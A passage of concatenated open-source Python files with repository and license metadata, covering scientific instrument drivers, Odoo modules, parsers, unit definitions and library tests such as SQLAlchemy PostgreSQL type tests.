b=b[init_cut:end_cut]
c=c[init_cut:end_cut]
d=d[init_cut:end_cut]
e=e[init_cut:end_cut]
f=f[init_cut:end_cut]
g=g[init_cut:end_cut]
h=h[init_cut:end_cut]
i=i[init_cut:end_cut]
datos={'roll':a,'pitch':b,'yaw':c, 'X':d, 'Y':e, 'Z':f,'time':g, 'ledblue':h, 'ledred':i}
return datos
def reset_tempo(var_in,var_out):
uni = var_in[0]
for t in range(0,len(var_in)):
var_out.append(round((var_in[t]-uni),3))
return var_out
graph(0,data['time'])
init_cut = float(input("tiempo inicial: "))
init_cuty = find_nearest(data['time'],init_cut)
end_cut = float(input("tiempo final: "))
end_cuty = find_nearest(data['time'],end_cut)
New_data=corte(init_cuty,end_cuty,data['pitch'],data['roll'],data['yaw'],data['X'],data['Y'],data['Z'],data['time'],data['ledblue'],data['ledred'])
data = []
print(data)
data = New_data
print(data)
dt = reset_tempo(New_data['time'],dt)
graph(0,dt)
| gpl-3.0 |
imrehg/labhardware | projects/slm/cri_slm.py | 2 | 3677 | #!/usr/bin/env python
# USB Serial support for CRI Spatial Light Modulator
#
import serial
import os
class SLM:
"""
Spatial Light Modulator
"""
def __init__(self, serialport=None):
""" Create motor controller serial interface
Input:
serialport : name of the serial port (eg. '/dev/ttyUSB0' or 'COM1')
"""
self.termchar = "\r"
if (serialport is None):
if (os.name == 'nt'):
serialbase = "COM"
serialnumstart = 1
else:
serialbase = "/dev/ttyUSB"
serialnumstart = 0
for i in xrange(serialnumstart, 20):
serialport = "%s%d" %(serialbase,i)
self.iface = self.__connectport(serialport)
if not (self.iface is None) and self.getversion():
break
else:
self.iface = self.__connectport(serialport)
if self.iface is None:
print("Not connected...")
else:
print("Spatial Light Modulator connected on %s" %(serialport))
self._NMask = 2
self._NFrame = 128
self._NElement = 128
self._MaxValue = 4096
def __connectport(self, serialport):
try:
iface = serial.Serial(serialport, baudrate=460800, bytesize=8, \
stopbits=1, parity=serial.PARITY_NONE, \
timeout=10, xonxoff=0, rtscts=0, dsrdtr=0)
except:
iface = None
return iface
def set(self, command):
""" Send command to controller, and read answer if there's any
For correct behaviour, it seems we have to read at least one line
"""
self.iface.write(command+self.termchar)
self.iface.readline(eol=self.termchar)
def query(self, command):
self.set(command)
resp = self.iface.readline(eol=self.termchar).strip()
return resp
def _cmdproto(self, target, command):
if command == '?':
try:
answer = int(self.query(target+command).split()[1])
except:
answer = None
return answer
else:
try:
c = int(command)
self.set("%s %d" %(target, c))
except:
pass
finally:
return
def blockquery(self):
self.set("B?")
r = self.iface.read(self._NElement*2)
values = []
for i in xrange(0,self._NElement*2,2):
values.append(ord(r[i+1])*256 + ord(r[i]))
return values
def blockset(self, values):
if len(values) <> self._NElement:
return(1)
out = ""
for i in range(self._NElement):
out += chr(int(values[i]%256))+chr(int(values[i]/256))
self.set("B1")
self.iface.write(out)
return(0)
def cmdmask(self, command):
return self._cmdproto('M', command)
def cmdframe(self, command):
return self._cmdproto('F', command)
def cmdelement(self, command):
return self._cmdproto('E', command)
def cmdvalue(self, command):
return self._cmdproto('D', command)
def maxmask(self):
return self._NMask
def maxframe(self):
return self._NFrame
def maxelement(self):
return self._NElement
def maxvalue(self):
return self._MaxValue
def clearframe(self):
self.set("C 1")
def activeframe(self, frame):
self.set("P %d" %frame)
def getversion(self):
return self._cmdproto('V', '?')
| mit |
yvaucher/purchase-workflow | __unported__/purchase_fiscal_position_update/purchase.py | 4 | 3820 | # -*- coding: utf-8 -*-
#############################################################################
#
# Purchase Fiscal Position Update module for OpenERP
# Copyright (C) 2011-2014 Julius Network Solutions SARL <contact@julius.fr>
# Copyright (C) 2014 Akretion (http://www.akretion.com)
# @author Mathieu Vatel <mathieu _at_ julius.fr>
# @author Alexis de Lattre <alexis.delattre@akretion.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm
from openerp.tools.translate import _
class purchase_order(orm.Model):
_inherit = "purchase.order"
def fiscal_position_change(
self, cr, uid, ids, fiscal_position, order_line,
context=None):
'''Function executed by the on_change on the fiscal_position field
of a purchase order ; it updates taxes on all order lines'''
assert len(ids) in (0, 1), 'One ID max'
fp_obj = self.pool['account.fiscal.position']
res = {}
line_dict = self.resolve_2many_commands(
cr, uid, 'order_line', order_line, context=context)
lines_without_product = []
if fiscal_position:
fp = fp_obj.browse(cr, uid, fiscal_position, context=context)
else:
fp = False
for line in line_dict:
# Reformat line_dict so as to be compatible with what is
# accepted in res['value']
for key, value in line.iteritems():
if isinstance(value, tuple) and len(value) == 2:
line[key] = value[0]
if line.get('product_id'):
product = self.pool['product.product'].browse(
cr, uid, line.get('product_id'), context=context)
taxes = product.supplier_taxes_id
tax_ids = fp_obj.map_tax(
cr, uid, fp, taxes, context=context)
line['taxes_id'] = [(6, 0, tax_ids)]
else:
lines_without_product.append(line.get('name'))
res['value'] = {}
res['value']['order_line'] = line_dict
if lines_without_product:
res['warning'] = {'title': _('Warning')}
if len(lines_without_product) == len(line_dict):
res['warning']['message'] = _(
"The Purchase Order Lines were not updated to the new "
"Fiscal Position because they don't have Products.\n"
"You should update the Taxes of each "
"Purchase Order Line manually.")
else:
display_line_names = ''
for name in lines_without_product:
display_line_names += "- %s\n" % name
res['warning']['message'] = _(
"The following Purchase Order Lines were not updated "
"to the new Fiscal Position because they don't have a "
"Product:\n %s\nYou should update the "
"Taxes of these Purchase Order Lines manually."
) % display_line_names,
return res
| agpl-3.0 |
derekjchow/models | research/compression/entropy_coder/all_models/all_models_test.py | 14 | 2447 | # Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Basic test of all registered models."""
import tensorflow as tf
# pylint: disable=unused-import
import all_models
# pylint: enable=unused-import
from entropy_coder.model import model_factory
class AllModelsTest(tf.test.TestCase):
def testBuildModelForTraining(self):
factory = model_factory.GetModelRegistry()
model_names = factory.GetAvailableModels()
for m in model_names:
tf.reset_default_graph()
global_step = tf.Variable(tf.zeros([], dtype=tf.int64),
trainable=False,
name='global_step')
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1)
batch_size = 3
height = 40
width = 20
depth = 5
binary_codes = tf.placeholder(dtype=tf.float32,
shape=[batch_size, height, width, depth])
# Create a model with the default configuration.
print('Creating model: {}'.format(m))
model = factory.CreateModel(m)
model.Initialize(global_step,
optimizer,
model.GetConfigStringForUnitTest())
self.assertTrue(model.loss is None, 'model: {}'.format(m))
self.assertTrue(model.train_op is None, 'model: {}'.format(m))
self.assertTrue(model.average_code_length is None, 'model: {}'.format(m))
# Build the Tensorflow graph corresponding to the model.
model.BuildGraph(binary_codes)
self.assertTrue(model.loss is not None, 'model: {}'.format(m))
self.assertTrue(model.average_code_length is not None,
'model: {}'.format(m))
if model.train_op is None:
print('Model {} is not trainable'.format(m))
if __name__ == '__main__':
tf.test.main()
| apache-2.0 |
jacegem/lotto-store | lib/libfuturize/fixes/fix_future_builtins.py | 62 | 2028 | """
For the ``future`` package.
Adds this import line::
from builtins import XYZ
for each of the functions XYZ that is used in the module.
Adds these imports after any other imports (in an initial block of them).
"""
from __future__ import unicode_literals
from lib2to3 import fixer_base
from lib2to3.pygram import python_symbols as syms
from lib2to3.fixer_util import Name, Call, in_special_context
from libfuturize.fixer_util import touch_import_top
# All builtins are:
# from future.builtins.iterators import (filter, map, zip)
# from future.builtins.misc import (ascii, chr, hex, input, isinstance, oct, open, round, super)
# from future.types import (bytes, dict, int, range, str)
# We don't need isinstance any more.
replaced_builtin_fns = '''filter map zip
ascii chr hex input next oct
bytes range str raw_input'''.split()
# This includes raw_input as a workaround for the
# lib2to3 fixer for raw_input on Py3 (only), allowing
# the correct import to be included. (Py3 seems to run
# the fixers the wrong way around, perhaps ignoring the
# run_order class attribute below ...)
expression = '|'.join(["name='{0}'".format(name) for name in replaced_builtin_fns])
class FixFutureBuiltins(fixer_base.BaseFix):
BM_compatible = True
run_order = 7
# Currently we only match uses as a function. This doesn't match e.g.:
# if isinstance(s, str):
# ...
PATTERN = """
power<
({0}) trailer< '(' [arglist=any] ')' >
rest=any* >
|
power<
'map' trailer< '(' [arglist=any] ')' >
>
""".format(expression)
def transform(self, node, results):
name = results["name"]
touch_import_top(u'builtins', name.value, node)
# name.replace(Name(u"input", prefix=name.prefix))
| apache-2.0 |
sniemi/SamPy | sandbox/src1/TCSE3-3rd-examples/src/app/wavesim2D/F77/autoedit.py | 1 | 5475 | #!/usr/bin/env python
# automatic execution of HPC exercises
import shutil, sys, os, re, glob
counter = 0
def edit(from_to, filename='F77WAVE.fcp'):
"""
substitute (from,to) in from_to list, e.g.
edit((r'from',r'to'))
"""
shutil.copy(filename + ".orig", filename)
f = open(filename, 'r')
filestr = f.read() # read file into memory
f.close()
for (from_, to) in from_to:
c = re.compile(from_, re.MULTILINE)
filestr = c.sub(to, filestr)
f = open(filename, 'w')
f.write(filestr)
f.close()
global counter
shutil.copy(filename, filename + str(counter)); counter += 1
def compile(compiler, options):
# run C preprocessor on F77WAVE.fcp and create F77WAVE.f:
os.system("./fcpp.py F77WAVE.fcp")
# compile and link:
cmd = "%s %s -pg -o app F77WAVE.f main.f" % (compiler, options)
print cmd
os.system(cmd)
def write_results(message, file):
file.write("\n\n-----------------------------------------------\n")
file.write(">>>> " + message + "\n")
# extract table from the output of gprof
res = os.popen("gprof app")
lines = res.readlines()
res.close()
# grab table:
m = re.search(r"(\% cumulative.*)\%\s+the percentage of the total",
''.join(lines), re.DOTALL)
if m:
table = m.group(1)
file.write(table)
# write the current version F77WAVE.f:
f = open('F77WAVE.f', 'r'); filestr = f.read(); f.close()
file.write("\n*** current version of F77WAVE.f ***\n")
file.write(filestr)
file.write("************\n\n")
# extract CPU time and return
for line in lines:
if re.search(r"MAIN__$", line):
cpu_time = float(line.split()[1])
break
print message, cpu_time, "sec"
return cpu_time
def run():
#print "running app..."
#os.system("app > /dev/null")
os.system("app")
def test_IO(compiler, options):
message = "with I/O (call dump)"
edit(((r"^C(\s+)call dump", r" \1call dump"),), filename="main.f")
compile(compiler, options)
run()
cpu = write_results(message, resultfile)
compactresults.append((message, cpu))
# back to normal files:
shutil.copy('main.f.orig', 'main.f')
shutil.copy('F77WAVE.fcp.orig', 'F77WAVE.fcp')
# clean up the big files:
tmpfiles = glob.glob('tmp_*')
for file in tmpfiles: os.remove(file)
def test_Olevels(compiler, options):
for i in range(0,4,1):
message = "with optimization level -O%d" % i
compile(compiler, options + " -O%d " % i)
run()
cpu = write_results(message, resultfile)
compactresults.append((message, cpu))
def test_loop_unrolling(compiler, options):
message = "loop unrolling (by the compiler)"
compile(compiler, options + " -funroll-loops ")
run()
cpu = write_results(message, resultfile)
compactresults.append((message, cpu))
def test_swap_loops(compiler, options):
message = "traverse arrays column by column"
edit(((r"DO 20 j = 2, ny-1", r"DO 20 i = 2, nx-1"),
(r"DO 10 i = 2, nx-1", r"DO 10 j = 2, ny-1")))
compile(compiler, options)
run()
cpu = write_results(message, resultfile)
compactresults.append((message, cpu))
def test_callfunc1(compiler, options):
message = "lambda(i,j) replaced by function call h(0,0)"
edit(((r"lambda\(([^,]+),([^)]+)\)", r"h(0,0)"),
(r"REAL\*8 a, b, c", r"REAL*8 a, b, c, h"),
(r", h\(0,0\)", r"")))
compile(compiler, options)
run()
cpu = write_results(message, resultfile)
compactresults.append((message, cpu))
def test_callfunc2(compiler, options):
message = "lambda(i,j) replaced by function call h((i-1)*delta,(j-1)*delta)"
edit(((r"lambda\(([^,]+),([^)]+)\)", r"h((\1 -1)*delta,(\2 -1)*delta)"),
(r"REAL\*8 a, b, c", r"REAL*8 a, b, c, h, delta"),
(r"INTEGER i,j", r"INTEGER i,j\n delta = 10.0/(nx-1)"),
(r", h\(\(nx .*$", r"")))
compile(compiler, options)
run()
cpu = write_results(message, resultfile)
compactresults.append((message, cpu))
def test_iftests_in_loops(compiler, options):
message = "if-tests inside loops"
edit(((r"DO 20 j = 2, ny-1", r"DO 20 j = 1, ny"),
(r"DO 10 i = 2, nx-1", r"DO 10 i = 1, nx\n if (i .ge. 2 .and. i .le. nx-1 .and. j .ge. 2 \n > .and. j .le. ny-1) then"),
(r"10 CONTINUE", r" end if\n 10 CONTINUE")))
compile(compiler, options)
run()
cpu = write_results(message, resultfile)
compactresults.append((message, cpu))
#---------------------------------------------------------------------------
# run exercises:
resultfile = open('results', 'w')
compactresults = []
# make sure we start with the right files:
shutil.copy('main.f.orig', 'main.f')
shutil.copy('F77WAVE.fcp.orig', 'F77WAVE.fcp')
#print "test1:"
#test_iftests_in_loops('g77', '-O3')
#sys.exit(1)
tests = [test_IO, test_Olevels, test_loop_unrolling,
test_swap_loops, test_callfunc1, test_callfunc2,
test_iftests_in_loops]
#tests = [test_loop_unrolling,
# test_callfunc1, test_callfunc2, test_iftests_in_loops]
for compiler in ['g77']:
for options in ['-O3']:
for test in tests:
test(compiler, options)
resultfile.close()
# write a compact table with the main results:
print "\n\n\n"
for (case, cpu) in compactresults:
print "%-65s %10.3f" % (case, cpu)
| bsd-2-clause |
nadley/Sick-Beard | lib/hachoir_parser/archive/bzip2_parser.py | 90 | 2896 | """
BZIP2 archive file
Author: Victor Stinner
"""
from lib.hachoir_parser import Parser
from lib.hachoir_core.field import (ParserError, String,
Bytes, Character, UInt8, UInt32, CompressedField)
from lib.hachoir_core.endian import LITTLE_ENDIAN
from lib.hachoir_core.text_handler import textHandler, hexadecimal
try:
from bz2 import BZ2Decompressor
class Bunzip2:
def __init__(self, stream):
self.bzip2 = BZ2Decompressor()
def __call__(self, size, data=''):
try:
return self.bzip2.decompress(data)
except EOFError:
return ''
has_deflate = True
except ImportError:
has_deflate = False
class Bzip2Parser(Parser):
PARSER_TAGS = {
"id": "bzip2",
"category": "archive",
"file_ext": ("bz2",),
"mime": (u"application/x-bzip2",),
"min_size": 10*8,
"magic": (('BZh', 0),),
"description": "bzip2 archive"
}
endian = LITTLE_ENDIAN
def validate(self):
if self.stream.readBytes(0, 3) != 'BZh':
return "Wrong file signature"
if not("1" <= self["blocksize"].value <= "9"):
return "Wrong blocksize"
return True
def createFields(self):
yield String(self, "id", 3, "Identifier (BZh)", charset="ASCII")
yield Character(self, "blocksize", "Block size (KB of memory needed to uncompress)")
yield UInt8(self, "blockheader", "Block header")
if self["blockheader"].value == 0x17:
yield String(self, "id2", 4, "Identifier2 (re8P)", charset="ASCII")
yield UInt8(self, "id3", "Identifier3 (0x90)")
elif self["blockheader"].value == 0x31:
yield String(self, "id2", 5, "Identifier 2 (AY&SY)", charset="ASCII")
if self["id2"].value != "AY&SY":
raise ParserError("Invalid identifier 2 (AY&SY)!")
else:
raise ParserError("Invalid block header!")
yield textHandler(UInt32(self, "crc32", "CRC32"), hexadecimal)
if self._size is None: # TODO: is it possible to handle piped input?
raise NotImplementedError
size = (self._size - self.current_size)/8
if size:
for tag, filename in self.stream.tags:
if tag == "filename" and filename.endswith(".bz2"):
filename = filename[:-4]
break
else:
filename = None
data = Bytes(self, "file", size)
if has_deflate:
CompressedField(self, Bunzip2)
def createInputStream(**args):
if filename:
args.setdefault("tags",[]).append(("filename", filename))
return self._createInputStream(**args)
data._createInputStream = createInputStream
yield data
| gpl-3.0 |
SINGROUP/pycp2k | pycp2k/classes/_each6.py | 1 | 1112 | from pycp2k.inputsection import InputSection
class _each6(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Just_energy = None
self.Powell_opt = None
self.Qs_scf = None
self.Xas_scf = None
self.Md = None
self.Pint = None
self.Metadynamics = None
self.Geo_opt = None
self.Rot_opt = None
self.Cell_opt = None
self.Band = None
self.Ep_lin_solver = None
self.Spline_find_coeffs = None
self.Replica_eval = None
self.Bsse = None
self.Shell_opt = None
self.Tddft_scf = None
self._name = "EACH"
self._keywords = {'Bsse': 'BSSE', 'Cell_opt': 'CELL_OPT', 'Just_energy': 'JUST_ENERGY', 'Band': 'BAND', 'Xas_scf': 'XAS_SCF', 'Rot_opt': 'ROT_OPT', 'Replica_eval': 'REPLICA_EVAL', 'Tddft_scf': 'TDDFT_SCF', 'Shell_opt': 'SHELL_OPT', 'Md': 'MD', 'Pint': 'PINT', 'Metadynamics': 'METADYNAMICS', 'Geo_opt': 'GEO_OPT', 'Spline_find_coeffs': 'SPLINE_FIND_COEFFS', 'Powell_opt': 'POWELL_OPT', 'Qs_scf': 'QS_SCF', 'Ep_lin_solver': 'EP_LIN_SOLVER'}
| lgpl-3.0 |
DMLoy/ECommerceBasic | lib/python2.7/site-packages/south/utils/__init__.py | 119 | 1945 | """
Generally helpful utility functions.
"""
def _ask_for_it_by_name(name):
"Returns an object referenced by absolute path."
bits = str(name).split(".")
## what if there is no absolute reference?
if len(bits) > 1:
modulename = ".".join(bits[:-1])
else:
modulename = bits[0]
module = __import__(modulename, {}, {}, bits[-1])
if len(bits) == 1:
return module
else:
return getattr(module, bits[-1])
def ask_for_it_by_name(name):
"Returns an object referenced by absolute path. (Memoised outer wrapper)"
if name not in ask_for_it_by_name.cache:
ask_for_it_by_name.cache[name] = _ask_for_it_by_name(name)
return ask_for_it_by_name.cache[name]
ask_for_it_by_name.cache = {}
def get_attribute(item, attribute):
"""
Like getattr, but recursive (i.e. you can ask for 'foo.bar.yay'.)
"""
value = item
for part in attribute.split("."):
value = getattr(value, part)
return value
def auto_through(field):
"Returns if the M2M class passed in has an autogenerated through table or not."
return (
# Django 1.0/1.1
(not field.rel.through)
or
# Django 1.2+
getattr(getattr(field.rel.through, "_meta", None), "auto_created", False)
)
def auto_model(model):
"Returns if the given model was automatically generated."
return getattr(model._meta, "auto_created", False)
def memoize(function):
"Standard memoization decorator."
name = function.__name__
_name = '_' + name
def method(self):
if not hasattr(self, _name):
value = function(self)
setattr(self, _name, value)
return getattr(self, _name)
def invalidate():
if hasattr(method, _name):
delattr(method, _name)
method.__name__ = function.__name__
method.__doc__ = function.__doc__
method._invalidate = invalidate
return method
| mit |
kirca/OpenUpgrade | addons/base_setup/res_config.py | 261 | 5089 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
import re
from openerp.report.render.rml2pdf import customfonts
class base_config_settings(osv.osv_memory):
_name = 'base.config.settings'
_inherit = 'res.config.settings'
_columns = {
'module_multi_company': fields.boolean('Manage multiple companies',
help='Work in multi-company environments, with appropriate security access between companies.\n'
'-This installs the module multi_company.'),
'module_share': fields.boolean('Allow documents sharing',
help="""Share or embbed any screen of Odoo."""),
'module_portal': fields.boolean('Activate the customer portal',
help="""Give your customers access to their documents."""),
'module_auth_oauth': fields.boolean('Use external authentication providers, sign in with google, facebook, ...'),
'module_base_import': fields.boolean("Allow users to import data from CSV files"),
'module_google_drive': fields.boolean('Attach Google documents to any record',
help="""This installs the module google_docs."""),
'module_google_calendar': fields.boolean('Allow the users to synchronize their calendar with Google Calendar',
help="""This installs the module google_calendar."""),
'font': fields.many2one('res.font', string="Report Font", domain=[('mode', 'in', ('Normal', 'Regular', 'all', 'Book'))],
help="Set the font into the report header, it will be used as default font in the RML reports of the user company"),
}
_defaults= {
'font': lambda self,cr,uid,c: self.pool.get('res.users').browse(cr, uid, uid, c).company_id.font.id,
}
def open_company(self, cr, uid, ids, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context)
return {
'type': 'ir.actions.act_window',
'name': 'Your Company',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'res.company',
'res_id': user.company_id.id,
'target': 'current',
}
def _change_header(self, header,font):
""" Replace default fontname use in header and setfont tag """
default_para = re.sub('fontName.?=.?".*"', 'fontName="%s"'% font,header)
return re.sub('(<setFont.?name.?=.?)(".*?")(.)', '\g<1>"%s"\g<3>'% font,default_para)
def set_base_defaults(self, cr, uid, ids, context=None):
ir_model_data = self.pool.get('ir.model.data')
wizard = self.browse(cr, uid, ids, context)[0]
if wizard.font:
user = self.pool.get('res.users').browse(cr, uid, uid, context)
font_name = wizard.font.name
user.company_id.write({'font': wizard.font.id,'rml_header': self._change_header(user.company_id.rml_header,font_name), 'rml_header2': self._change_header(user.company_id.rml_header2, font_name), 'rml_header3': self._change_header(user.company_id.rml_header3, font_name)})
return {}
def act_discover_fonts(self, cr, uid, ids, context=None):
return self.pool.get("res.font").font_scan(cr, uid, context=context)
# Preferences wizard for Sales & CRM.
# It is defined here because it is inherited independently in modules sale, crm.
class sale_config_settings(osv.osv_memory):
_name = 'sale.config.settings'
_inherit = 'res.config.settings'
_columns = {
'module_web_linkedin': fields.boolean('Get contacts automatically from linkedIn',
help="""When you create a new contact (person or company), you will be able to load all the data from LinkedIn (photos, address, etc)."""),
'module_crm': fields.boolean('CRM'),
'module_sale' : fields.boolean('SALE'),
'module_mass_mailing': fields.boolean(
'Manage mass mailing campaigns',
help='Get access to statistics with your mass mailing, manage campaigns.'),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | agpl-3.0 |
foxichu/etherkeeper | etherkeeper/util/helpers.py | 2 | 1433 | import json
import datetime
import time
from django.conf import settings
from django.http import HttpResponse
from django.template import loader
def epoch_time(add=0):
'Returns time since epoch'
return time.mktime(datetime.datetime.now().timetuple()) + add
def jsonify(*args, **kwargs):
'Returns a json response'
data = None
if args:
data = args[0] if len(args) == 1 else [arg for arg in args]
if kwargs:
if data:
if type(data) != list:
data = [data]
data.append(dict(**kwargs))
else:
data = dict(**kwargs)
return HttpResponse(json.dumps(data), content_type='application/json')
def jsonerror(error=None):
'JSON error response shortcut'
return jsonify(success=False, error=error)
def set_cookie(response, key, value, expire_days = 365,
domain=settings.SESSION_COOKIE_DOMAIN):
'Sets a cookie on a response for an amount of days'
max_age = expire_days * 24 * 60 * 60
expires = datetime.datetime.strftime(datetime.datetime.utcnow() +
datetime.timedelta(seconds=max_age), "%a, %d-%b-%Y %H:%M:%S GMT")
response.set_cookie(key, value, max_age=max_age, expires=expires,
domain=domain, secure=settings.SESSION_COOKIE_SECURE or None)
def srender(template, **kwargs):
'Render a template to string with given kwargs'
return loader.render_to_string(template, dict(**kwargs))
| mit |
jpshort/odoo | addons/hr/__openerp__.py | 260 | 2372 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Employee Directory',
'version': '1.1',
'author': 'OpenERP SA',
'category': 'Human Resources',
'sequence': 21,
'website': 'https://www.odoo.com',
'summary': 'Jobs, Departments, Employees Details',
'description': """
Human Resources Management
==========================
This application enables you to manage important aspects of your company's staff and other details such as their skills, contacts, working time...
You can manage:
---------------
* Employees and hierarchies : You can define your employee with User and display hierarchies
* HR Departments
* HR Jobs
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/employees',
'depends': ['base_setup','mail', 'resource', 'board'],
'data': [
'security/hr_security.xml',
'security/ir.model.access.csv',
'hr_view.xml',
'hr_installer.xml',
'hr_data.xml',
'res_config_view.xml',
'mail_hr_view.xml',
'res_users_view.xml',
'views/hr.xml',
],
'demo': ['hr_demo.xml'],
'test': [
'test/hr_users.yml',
'test/open2recruit2close_job.yml',
'test/hr_demo.yml',
],
'installable': True,
'application': True,
'auto_install': False,
'qweb': [ 'static/src/xml/suggestions.xml' ],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
eufarn7sp/egads-eufar | egads/thirdparty/quantities/units/area.py | 4 | 1079 | """
"""
from __future__ import absolute_import
from ..unitquantity import UnitQuantity
from .length import m, rod
are = ares = UnitQuantity(
'are',
100*m**2,
aliases=['ares']
)
b = barn = UnitQuantity(
'barn',
1e-28*m**2,
symbol='b',
aliases=['barnes']
)
cmil = circular_mil = UnitQuantity(
'circular_mil',
5.067075e-10*m**2,
symbol='cmil',
aliases=['circular_mils'],
doc='conversions approximate, area of a circle with diameter=1 mil'
)
D = darcy = UnitQuantity(
'darcy',
9.869233e-13*m**2,
symbol='D'
)
mD = millidarcy = UnitQuantity(
'millidarcy',
D/1000,
symbol='mD'
)
ha = hectare = UnitQuantity(
'hectare',
10000*m**2,
symbol='ha',
aliases=['hectares']
)
acre = international_acre = UnitQuantity(
'acre',
4046.8564224*m**2,
aliases=['acres', 'international_acre', 'international_acres'],
doc="exact. http://en.wikipedia.org/wiki/Acre"
)
US_survey_acre = UnitQuantity(
'US_survey_acre',
160*rod**2,
aliases=['US_survey_acres'],
)
del UnitQuantity, m, rod
| bsd-3-clause |
amyvmiwei/kbengine | kbe/src/lib/python/Lib/distutils/tests/test_spawn.py | 146 | 1857 | """Tests for distutils.spawn."""
import unittest
import os
import time
from test.support import captured_stdout, run_unittest
from distutils.spawn import _nt_quote_args
from distutils.spawn import spawn, find_executable
from distutils.errors import DistutilsExecError
from distutils.tests import support
class SpawnTestCase(support.TempdirManager,
support.LoggingSilencer,
unittest.TestCase):
def test_nt_quote_args(self):
for (args, wanted) in ((['with space', 'nospace'],
['"with space"', 'nospace']),
(['nochange', 'nospace'],
['nochange', 'nospace'])):
res = _nt_quote_args(args)
self.assertEqual(res, wanted)
@unittest.skipUnless(os.name in ('nt', 'posix'),
'Runs only under posix or nt')
def test_spawn(self):
tmpdir = self.mkdtemp()
# creating something executable
# through the shell that returns 1
if os.name == 'posix':
exe = os.path.join(tmpdir, 'foo.sh')
self.write_file(exe, '#!/bin/sh\nexit 1')
else:
exe = os.path.join(tmpdir, 'foo.bat')
self.write_file(exe, 'exit 1')
os.chmod(exe, 0o777)
self.assertRaises(DistutilsExecError, spawn, [exe])
# now something that works
if os.name == 'posix':
exe = os.path.join(tmpdir, 'foo.sh')
self.write_file(exe, '#!/bin/sh\nexit 0')
else:
exe = os.path.join(tmpdir, 'foo.bat')
self.write_file(exe, 'exit 0')
os.chmod(exe, 0o777)
spawn([exe]) # should work without any error
def test_suite():
return unittest.makeSuite(SpawnTestCase)
if __name__ == "__main__":
run_unittest(test_suite())
| lgpl-3.0 |
WinterNis/sqlalchemy | test/dialect/postgresql/test_types.py | 10 | 79161 | # coding: utf-8
from sqlalchemy.testing.assertions import eq_, assert_raises, \
assert_raises_message, is_, AssertsExecutionResults, \
AssertsCompiledSQL, ComparesTables
from sqlalchemy.testing import engines, fixtures
from sqlalchemy import testing
import datetime
from sqlalchemy import Table, MetaData, Column, Integer, Enum, Float, select, \
func, DateTime, Numeric, exc, String, cast, REAL, TypeDecorator, Unicode, \
Text, null, text
from sqlalchemy.sql import operators
from sqlalchemy import types
import sqlalchemy as sa
from sqlalchemy.dialects.postgresql import base as postgresql
from sqlalchemy.dialects.postgresql import HSTORE, hstore, array, \
INT4RANGE, INT8RANGE, NUMRANGE, DATERANGE, TSRANGE, TSTZRANGE, \
JSON, JSONB
import decimal
from sqlalchemy import util
from sqlalchemy.testing.util import round_decimal
from sqlalchemy import inspect
from sqlalchemy import event
tztable = notztable = metadata = table = None
class FloatCoercionTest(fixtures.TablesTest, AssertsExecutionResults):
__only_on__ = 'postgresql'
__dialect__ = postgresql.dialect()
__backend__ = True
@classmethod
def define_tables(cls, metadata):
data_table = Table('data_table', metadata,
Column('id', Integer, primary_key=True),
Column('data', Integer)
)
@classmethod
def insert_data(cls):
data_table = cls.tables.data_table
data_table.insert().execute(
{'data': 3},
{'data': 5},
{'data': 7},
{'data': 2},
{'data': 15},
{'data': 12},
{'data': 6},
{'data': 478},
{'data': 52},
{'data': 9},
)
@testing.fails_on(
'postgresql+zxjdbc',
'XXX: postgresql+zxjdbc currently returns a Decimal result for Float')
def test_float_coercion(self):
data_table = self.tables.data_table
for type_, result in [
(Numeric, decimal.Decimal('140.381230939')),
(Float, 140.381230939),
(Float(asdecimal=True), decimal.Decimal('140.381230939')),
(Numeric(asdecimal=False), 140.381230939),
]:
ret = testing.db.execute(
select([
func.stddev_pop(data_table.c.data, type_=type_)
])
).scalar()
eq_(round_decimal(ret, 9), result)
ret = testing.db.execute(
select([
cast(func.stddev_pop(data_table.c.data), type_)
])
).scalar()
eq_(round_decimal(ret, 9), result)
